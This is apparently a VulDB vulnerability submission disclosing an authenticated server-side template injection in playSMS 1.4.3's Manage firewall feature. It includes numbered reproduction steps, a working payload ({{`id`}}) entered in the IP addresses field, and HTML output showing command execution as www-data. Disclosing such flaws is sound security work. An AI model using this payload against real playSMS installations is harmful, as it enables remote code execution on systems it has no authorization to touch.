Отправить #363730: playSMS 1.4.3 Server Side Template Injection (SSTI)Информация

НазваниеplaySMS 1.4.3 Server Side Template Injection (SSTI)
ОписаниеPlaySMS 1.4.3 has authenticated Server Side Template Injection in Manage firewall. The manipulation of the argument IP addresses, that leads to a Authenticated RCE 1. Authenticate in login page http://192.168.1.20/playsms/index.php?app=main&inc=core_auth&route=login 2. Click in Settings > Manage firewall (/index.php?app=main&inc=feature_firewall&op=firewall_list) 3. Click in Plus (+) icon to add new rule 4. Add payload {{`id`}} in "IP addresses " field and add an user field "Select username" 5. Save and back to Settings > Manage firewall http://172.16.1.195/playsms/index.php?app=main&inc=feature_firewall&op=firewall_list&search_keyword=&search_category=&page=1&nav=1 <tbody> <tr> <td>admin</td> <td>uid=33(www-data) gid=33(www-data) groups=33(www-data) </td> <td> <input type=hidden name=itemid[0] value="7"> <input type=checkbox name=checkid[0]> </td> </tr>
Источник⚠️ https://github.com/playsms/playsms/tree/master/storage/application/plugin/feature/firewall
Пользователь
 Dhimitri (UID 45045)
Представление25.06.2024 01:03 (2 лет назад)
Модерация03.07.2024 07:29 (8 days later)
Статуспринято
Запись VulDB270277 [playSMS 1.4.3 Template IP-адрес эскалация привилегий]
Баллы20

Interested in the pricing of exploits?

See the underground prices here!